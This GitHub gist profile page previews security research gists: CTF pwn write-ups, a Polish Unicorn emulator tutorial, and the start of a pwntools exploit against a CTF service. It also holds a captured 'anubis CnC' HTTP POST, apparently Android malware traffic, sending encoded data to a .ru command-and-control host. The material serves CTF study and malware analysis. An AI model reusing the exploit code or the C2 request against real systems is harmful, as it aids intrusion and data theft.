Skip to content

Instantly share code, notes, and snippets.

View Eterna1's full-sized avatar

Eternal Eterna1

81 followers · 60 following
View GitHub Profile
@Eterna1
Eterna1 / gist:87324293fe266462355db22f7daa9114
Last active June 26, 2017 08:41
wiki write-up

My solution for task wiki

  • Event: Google Capture The Flag 2017 (Quals)
  • Category: pwn
  • Points: 243
  • Solves: ~30

We're given one file which can be downloaded here.
Task description - Challenge running at wiki.ctfcompetition.com:1337.

@Eterna1
Eterna1 / Mikhail.md
Last active March 24, 2018 22:37
Mikhail writeup - pwn200

W tym zadaniu dostajemy binarkę która działa po stronie serwera i źródło w C++.

programem checksec który instaluje się razem z pwndbg można sprawdzić z jakimi zabezpieczeniami program został skompilowany.

b@x:~/Desktop/mikhail > checksec story
[*] '/home/b/Desktop/mikhail/story'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
 Stack: No canary found
@Eterna1
Eterna1 / UE.md
Last active July 18, 2018 23:21
UE tutorial

Cheatsheet

from unicorn import * - ładujemy bibliotekę unicorna i stałe
from unicorn.x86_const import * - ładujemy stałe dotyczące architektur x86 i x86_64

stałe występujące w module unicorn:

UC_API_MAJOR                UC_ERR_VERSION              UC_MEM_READ                 UC_PROT_ALL
UC_API_MINOR                UC_ERR_WRITE_PROT           UC_MEM_READ_AFTER           UC_PROT_EXEC
@Eterna1
Eterna1 / moj_piekny_kodzik.py
Created November 24, 2017 12:24
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
@Eterna1
Eterna1 / gist:ed950307a676a2f2c1f2c860d2296fec
Created November 24, 2017 13:21
zad2_szablon.py
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
@Eterna1
Eterna1 / zadanie3.py
Created November 24, 2017 14:03
zadanie3.py
from unicorn import *
from unicorn.x86_const import *
import struct
def read(name):
with open(name) as f:
return f.read()
def u32(data): #zamien ciag 4 bajtow na liczbe w formacie little-endian
@Eterna1
Eterna1 / anubis CnC
Created September 12, 2018 19:45
POST /private/tuk_tuk.php HTTP/1.1
Content-Length: 104
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: aktivierung-342675-deustchland-services.ru
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
p=NjBkMDgxOTg5ODYyMmUxOThjY2Y2ZTI3OGYyNDZjMDE1OTJhOWE3M2ZiZjZlODVkMGE5NWMyNDVm
ZjY3NTQ5ZTc3YWNhOGQxOGM=
@Eterna1
Eterna1 / exploit.py
Created June 4, 2019 13:43
malwaredb2 epxloit
from pwn import *
#r = remote("localhost", 1337)
r = remote("malwaredb2.zajebistyc.tf", 30103)
print r.recvuntil("5. Exit\n\n---------------------------------------")
def new(name, description="", sha="", ransom=""):
r.send("1\n")
@Eterna1
Eterna1 / chrome_diff.diff
Created August 8, 2019 06:47
chrome_diff.diff
diff --git a/content/browser/BUILD.gn b/content/browser/BUILD.gn
index 7a1d4333934a..3218fb403839 100644
--- a/content/browser/BUILD.gn
+++ b/content/browser/BUILD.gn
@@ -236,6 +236,14 @@ jumbo_source_set("browser") {
]
sources = [
+ "CTF/person_interface_impl.cc",
+ "CTF/person_interface_impl.h",
@Eterna1
Eterna1 / service.py
Created August 8, 2019 06:49
service.py
#! /usr/bin/python
import subprocess
import sys
import time
from threading import Timer
def kill(proc):
proc.kill()
def main():